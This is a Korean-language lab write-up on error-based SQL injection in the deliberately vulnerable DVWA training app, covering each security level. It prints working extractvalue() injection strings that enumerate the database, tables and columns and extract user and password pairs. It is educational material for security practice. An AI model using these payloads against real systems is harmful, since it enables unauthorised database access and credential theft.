[DVWA] SQL Injection (Error Based)

Vulnerability: SQL Injection

Error Based SQL Injection을 이용하여 DB 내부의 데이터를 조회하는 것을 목적으로 한다.

DVWA SQL Injection 실습

실습 환경
- Windows Docker를 이용한 DVWA
- Windows 환경의 Burp Suite

Security Level: Low

Low 레벨의 경우 입력값에 대하여 에러가 발생하는 경우, 에러 메시지에 에러에 대한 정보를 그대로 출력해주고 있다.

이를 이용하여 Error Based SQLi 를 시도해본다.

$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

 

DB 이름 확인하기

x' and extractvalue('1',concat(0x3a,(select database()))) and '1'='1

위와 같이 DB 이름은 dvwa인 것을 알 수 있다.

 

TABLE 이름 확인하기

x' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'dvwa'))) and '1'='1

Error Based의 결과 값은 한 줄만 출력이 가능한데, 결과 값이 여러줄이라서 에러가 발생하였다. limit을 이용하여 한줄 씩 출력하여 원하는 정보를 확인한다.

x' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1))) and '1'='1

위와 같이 guestbook, users 라는 이름의 테이블이 있다는 것을 알 수 있다.

 

COLUMN 이름 확인하기

위의 두 테이블 중 users 테이블이 회원정보이기 때문에 이를 확인해 볼 것이다. 위와 동일하게 여러줄 이기 때문에 limit를 이용하여 한 줄씩 출력해준다.

x' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name = 'users' limit 3,1))) and '1'='1

users 테이블에서 원하는 정보인 user, password 컬럼의 존재를 알 수 있다. 이를 열람해보도록 한다.

 

DATA 확인하기

user 컬럼과, password 컬럼을 동시에 조회하고 싶은데 Error Based에서는 한줄 씩 밖에 출력하지 못한다. concat을 이용하여 원하는 출력값을 이어 붙여서 한번에 출력해 줄 수 있다.

조회하는 컬럼의 수가 적거나, 에러 메시지를 이용하는 경우에는 여러 줄을 한꺼번에 열람하기 곤란하다. 이런 경우에는 SQL의 Concat()함수를 이용하면 원래의 컬럼 수 보다 더 많은 컬럼을 조회하는 것이 가능하다.

위의 경우를 예시로 들어보면 concat(user, ':', password) 라고 하면 user:password 와 같이 연결된 정보를 조회할 수 있다.

x' and extractvalue('1', concat(0x3a, (select concat(user, 0x3a, password) from users limit 0,1))) and '1'='1

위와 같이 users 테이블의 user, password 컬럼의 정보를 한 세트씩 묶어서 출력할 수 있는 것을 볼 수 있다.

---

Security Level: Medium

 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

Medium 레벨의 경우 소스코드에서 mysqli_real_escape_string을 적용하고 있기 때문에 입력값으로 '를 인식할 수 없다.

또한 콤보박스로 입력을 받기 때문에 ' 없이 숫자 값을 기본으로 입력받는 것을 확인할 수 있다. 그렇기 때문에 ' 없이 입력을 하기 위해, WHERE구문의 적용이 어려워서 전체 데이터들에 대하여 LIMIT을 이용하여 한줄씩 확인해보기로 한다.

 

DB 이름 확인하기

우선 DB의 정보를 확인해본다.

1 and extractvalue(rand(),concat(0x3a,(select version())))

다음으로 DB 이름을 확인해본다.

1 and extractvalue(rand(),concat(0x3a,(select database())))

DB이름은 dvwa임을 알 수 있다.

 

TABLE 이름 확인하기

다음으로 dvwa DB의 테이블을 확인해본다.

1 and extractvalue(rand(),concat(0x3a,(select table_name from information_schema.tables limit 1,1)))

guestbook과 users 테이블을 확인할 수 있다.

 

COLUMN 이름 확인하기

1 and extractvalue(rand(),concat(0x3a,(select column_name from information_schema.columns limit 7,1)))

users 테이블의 user와 password 컬럼을 확인할 수 있다.

 

DATA 확인하기

user, password 컬럼의 정보를 묶어서 세트로 한줄씩 확인해본다.

1 and extractvalue(rand(),concat(0x3a,(select concat(user,0x3a,password)from users limit 0,1)))

위와 같이 데이터가 묶여서 user,password가 한 세트로 출력되는 것을 확인할 수 있다.

---

Security Level: High

High 레벨부터는 Error 메시지에 대한 처리가 달라진다.

Low 레벨과 Medium 레벨의 경우에는 다음과 같이 에러 메시지가 에러의 내용을 그대로 출력해준다.

Low 레벨 에러 메시지

Medium 레벨 에러 메시지

하지만 High 레벨의 경우 다음과 같이 에러가 발생했을 때, 에러의 내용을 출력하지 않고, 'Something went wrong' 이라는 고정된 메시지를 출력한다.

High 레벨 에러 메시지

그렇기 때문에 High레벨에서의 Error Based SQL Injection은 불가능하다.

위와 같이 일관된 에러 메시지가 출력되는 것을 확인할 수 있다.

---

Security Level: Impossible

Impossible 레벨의 경우 애초에 SQL Injection이 불가능하고, 정해진 값에 대하여만 파라미터로서 이용하기 때문에 에러 메시지 또한 따로 처리하지 않고 있다.

---

질문 환영, 수정 및 보완에 대한 지적 환영